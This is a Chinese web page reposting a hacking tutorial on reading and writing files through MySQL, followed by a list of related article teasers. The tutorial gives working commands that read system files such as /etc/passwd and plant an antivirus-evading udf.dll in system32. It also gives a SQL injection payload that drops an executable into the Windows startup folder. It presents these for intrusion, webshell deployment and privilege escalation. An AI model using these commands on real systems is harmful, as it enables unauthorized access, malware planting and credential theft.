如何在mysql下读取文件?mysql下读取文件的方法
章出处:C.R.S.T
作者:sai52[B.H.S.T]
blog:www.sai52.com
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同。
mysql3.x下
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
mysql>create table a (cmd text);
mysql>load data infile 'c:\\boot.ini' into table a;
mysql>select * from a;
mysql4.x下
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
mysql>create table a (cmd text);
mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
mysql>select * from a;
mysql5.x下
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
mysql>system cat /etc/passwd
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
例:把免杀过的udf.dll文件插入系统目录
create table a (cmd LONGBLOB);
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中理论上应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。
注入中的语法
[Copy to clipboard] [ - ]CODE:
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/mm.exe'/*
测试后发现注入中运用不太现实,因为要导出二进制文件要求必须数据类型为blob或longblob,现实中极少用到。
利用mysql弱口令拿到系统权限的前提条件是什么?怎么提权?
S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着
详情2018-02-12 08:50:46责编:llp 来源:驱动管家渗透测试工具:maligno有哪些功能?
今天我想介绍一个能够在渗透测设中帮到你的工具。Maligno是一个基于FreeBSD许可证的开源的渗透测试工具。使用Python编写,最大限度与Metasploit兼容。它利用Metasploit framework框架,尤其是msfvenom,来生成AES
详情2018-01-20 14:05:41责编:llp 来源:驱动管家- 详情2018-02-14 18:28:57责编:llp 来源:驱动管家
你知道怎么入侵139端口吗?这里有简单教程
提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。首先,连接的命令是:netuse IP地址 ipc$Content$lt;空格>密码 user:用户名假
详情2018-01-23 09:06:43责编:llp 来源:驱动管家filezilla怎么用?filezilla server的安装和配置
Filezilla的主要优势在于:高安全、高性能。Filazilla的安全性是来自于其开放源代码的。开源为何能保证安全?每一款软件产品诞生后,都有很多人试图发现其漏洞进行攻击,以获取权限和其他利益。如果是开源软件,
详情2018-01-26 10:57:51责编:llp 来源:驱动管家为什么会产生盗链?iis如何防盗链?
“盗链”的定义是:此内容不在自己服务器上,而通过技术手段,绕过别人放广告有利益的最终页,直接在自己的有广告有利益的页面上向最终用户提供此内容。 常常是一些名不见经传的小网站来盗取一些有实力的大网站
详情2018-02-02 20:38:28责编:llp 来源:驱动管家黑客入门教程 黑客入门的知识大讲解
第一节、黑客的种类和行为以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵
详情2018-01-16 08:54:11责编:llp 来源:驱动管家监视软件nagios的缓冲区溢出漏洞可能被利用控制服务器
受影响系统:Nagios Nagios 1 4 9不受影响系统:Nagios Nagios 1 4 10描述:--------------------------------------------------------------------------------BUGTRAQ ID: 25952CVE(CAN) ID: CVE-2007
详情2018-01-25 11:28:41责编:llp 来源:驱动管家mcafee是什么?安装mcafee的注意事项有哪些?
规则有点多,并不是一定要全设,看自己的实际情况啦!咖啡是国际上三大杀软之一,也是下载使用率最高的杀软。它是迄今为止监控最灵敏的杀软,也是监控最全面的杀软。下面是咖啡官方对咖啡杀软的简介:McAfee防毒
详情2018-01-23 09:13:53责编:llp 来源:驱动管家怎么写shell脚本防网站攻击?电脑大牛为你示范
不知道得罪了哪路神仙,收到nagios报警,发现有个网站有CC攻击。看样子,量还不小,把服务器的负载都弄到40+了,虽然网站还能打开,但打开也是非常的缓慢。如果不是配置高点,估计服务器早就挂掉了。看来又是不一
详情2018-01-17 20:49:31责编:llp 来源:驱动管家
- 种子下载软件除了迅雷还有别的吗?种子下载软件排行
- 施耐德镜头的性能好不好?施耐德镜头的介绍
- Apple Watch将推出虚拟SIM卡 技术上和小米华为大不相同
- 蓝屏代码查询器不知道怎么使用?蓝屏代码查询器使用方法
- 酷派8705评测报告 为你揭秘酷派8705的性能
- 微信人家的拆礼盒功能在哪里?微信拆礼盒怎么做
- 免密码登录的方法:连接肉鸡3389,敲5下shift键
- 怎样利用三维cad做设计图?三维CAD教程
- 关于这些镜头知识你都知道多少?
- 【游戏攻略】还在用F捡东西?这就是你和韦神的差距
- 【游戏攻略】绝地求生沙漠地图 两大钢枪位置推荐
- 教你用电脑管家这样开启蓝屏修复的功能
- 更新电脑系统之后电脑蓝屏开不了机的情况怎么解决
- 大神f1升级失败的原因以及解决方法
- 手机没信号怎么回事?手机没信号的解决方法
- 微信公众号能不能修改名字?微信公众号名字怎么改
- 微信电脑版能不能撤回消息?怎么撤回
- 解决下载木马程序时网页暂停或报错问题的程序代码
- 分析iss日志找寻网站为什么被黑?怎么被黑?
- MTK手机驱动能不能在电脑上安装?win8 64位怎么安装MTK手机驱动